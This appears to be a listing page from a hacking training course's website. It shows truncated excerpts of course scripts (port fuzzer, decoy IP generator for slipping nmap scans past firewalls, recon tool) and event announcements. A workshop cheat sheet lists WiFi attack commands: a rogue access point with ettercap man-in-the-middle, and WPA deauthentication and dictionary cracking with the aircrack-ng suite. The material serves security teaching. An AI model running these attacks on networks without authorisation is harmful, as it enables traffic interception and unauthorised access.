Codes

In this page you’ll find links to some of the codes we release. Some are written just by us and some are written with our students.

Hope you will find them useful.

 

Compact Wireless Drivers Installation

Posted by on Nov 12, 2012 in Code | 4 comments

A script by Bar Hofesh to install the compact-wireless drivers on your machine according to your kernel version. Many thanks to Tom Lime for posting his improvement of the script! #!/bin/bash # Coded by Bar Hofesh # Improved by Tom Lime # Checking kernel version chance=$(uname -r | cut -d. -f1-2) bdir=/tmp/compat_wireless case "$chance" in "3.1") url="http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.1/compat-wireless-3.1-rc8-1.tar.bz2" ;; "3.2")...

read more

Protected: Cheat Sheet – 13/11/2012

Posted by on Nov 12, 2012 in Code | Enter your password to view comments.

Protected: Cheat Sheet – 13/11/2012

Welcome to the Cheat Sheet for the Hack n’ Beer night at the Saloona Bar. And a script by Bar Hofesh to install compact-wireless driver according to your kernel version. Here are some basic commands ready for you         Airebase airmon-ng start wlan0 airbase-ng -e $ESSID -P -C 30 -v mon0 echo "1" > /proc/sys/net/ipv4/ip_forward ettercap -Tq -p -i mon0 // //   WPA1/2 airmon-ng start wlan0 airodump-ng -w filename -c $CH mon0 aireplay-ng -0 0 -a $AP mon0 aircrack-ng -w dic.dic file.cap   WEP...

read more

Simple Port Fuzzer

Posted by on Nov 8, 2012 in Code | 0 comments

A script written by Bar Hofesh to help you fuzz those services #!/usr/bin/python # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # .__.................__......................_._......... # / _\.___..___....../ _\.___..___._..._._.__(_) |_._..._. # \ \./ _ \/ _ \_____\ \./ _ \/ __| |.| | '__| | __| |.| | # _\ \ __/ __/_____|\ \ __/ (__| |_| | |..| | |_| |_| | #...

read more

Random IP Addresses Generator

Posted by on Nov 8, 2012 in Code | 0 comments

For all those times you wanted to conduct a port scanning but that annoying firewall blocked you. Use this script to give nmap a good decoy sourse list. You can get it using    ‘wget hackingdefined.org/tools/rand_ip_gen.tar.gz’ #!/usr/bin/python # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # ..__...__.........._____. # _/ |_|__|._______/ ___\ # \ __\ |/ ___/\ __\. # .| |.| |\___...

read more

Automatic Network Reconnaissance Tool

Posted by on Nov 8, 2012 in Code, Main Menu | 0 comments

Automatic Network Reconnaissance Tool

This script was build with Bar Hofesh and it’s purpose it to be a first test you apply while conducting an infrastructure pentest. Any ideas or comments – fell free to contact us and propose. sadfasfdasdf asfdasdfsadfsdf #!/bin/bash # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # #                    ..__...__.........._____. #                    _/  |_|__|._______/  ___\...

read more

Hack n’ Beer! – 802.11

Posted by on Oct 29, 2012 in Events | 0 comments

Hack n’ Beer! – 802.11

So, on the 13th of November we had an awesome night of Hack n Beer at the Saloona Bar in Tel Aviv. During the even we learned about attack vectors for all known and familiar 802.11 WiFi. Pictures from the event can be found at See-Security’s page on Facebook in this album. Waiting to see you in our next event!

read more

For Those Who Dare!

Posted by on Oct 22, 2012 in Main Menu | 2 comments

For Those Who Dare!

Coolest logo!        

read more

Update on Facebook

Posted by on Oct 14, 2012 in Main Menu | 0 comments

Update on Facebook

If you like our course and want to see some more cool updates and news which are posted constantly you can like us on facebook.

read more

Syllabus for Hacking Defined Experts

Posted by on Oct 14, 2012 in About | 0 comments

Syllabus for Hacking Defined Experts

Dear Applicant, Thank you for showing interest in our Hacking Defined Experts program. This document is intended to provide all the information needed about the course, the logistics and requirements of the program. Please read it carefully and save it for later reference during or prior to the course. What to Expect The study of hacking is a complex one. In this program we try to give the basics and a bit more to all of th fields of hacking. Homeworks are crucial to the success of the students. In this course we have 3 types of homeworks:...

read more

Hacking Defined Expert 37

Posted by on Oct 9, 2012 in Main Menu | 0 comments

Hacking Defined Expert 37

A new cycle of Hacking Defined Experts number 37 (36 closed registration)! Good luck to all the students and see you at the final challenge!

read more